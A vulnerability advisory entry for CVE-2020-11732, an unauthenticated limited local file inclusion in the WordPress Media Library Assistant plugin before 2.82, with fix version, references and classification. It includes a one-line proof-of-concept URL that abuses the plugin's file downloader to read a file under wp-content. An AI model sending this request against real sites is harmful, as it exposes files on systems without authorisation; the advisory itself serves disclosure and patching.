Media Library Assistant < 2.82 - Unauthenticated Limited Local File Inclusion
Description
The Media Library Assistant plugin before 2.82 for WordPress suffers from a Local File Inclusion vulnerability in mla_gallery link=download.
Proof of Concept
The LFI is restricted to the "wp-content" directory.

http://www.example.com/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/htl&mla_download_file=/app/public/wp-content/plugins/index.php

Affects Plugin

Media Library Assistant, fixed in version 2.82

References

CVE CVE-2020-11732
ExploitDB 48315
PacketStorm 157200
URL https://plugins.trac.wordpress.org/changeset/2273526/media-library-assistant

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Verified Yes
WPVDB ID 10177

Timeline

Publicly Published 2020-04-13
Added 2020-04-13
Last Updated 2020-04-15